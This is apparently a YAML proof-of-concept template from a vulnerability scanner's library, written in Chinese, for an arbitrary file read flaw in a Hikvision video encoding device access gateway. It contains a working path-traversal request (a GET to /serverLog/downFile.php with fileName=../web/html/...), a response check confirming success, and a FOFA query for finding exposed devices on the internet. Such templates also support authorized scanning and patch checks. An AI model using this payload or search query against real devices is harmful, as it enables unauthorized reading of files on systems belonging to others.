product: 海康威视视频编码设备接入网关
vName: 海康威视视频编码设备接入网关 任意文件读取
type: 文件读取
vID: [ ]
level: 3
vDesc: 海康威视是以视频为核心的智能物联网解决方案和大数据服务提供商。杭州海康威视系统技术有限公司流媒体管理服务器存在任意文件读取漏洞。
version: ''
note: ''
search:
  FOFA: app="HIKVISION-视频编码设备接入网关"
protocol: http
link: https://www.zhihu.com/tardis/zm/art/625500374?source_id=1003
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /serverLog/downFile.php?fileName=../web/html/serverLog/downFile.php
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - file_name=
            logic: and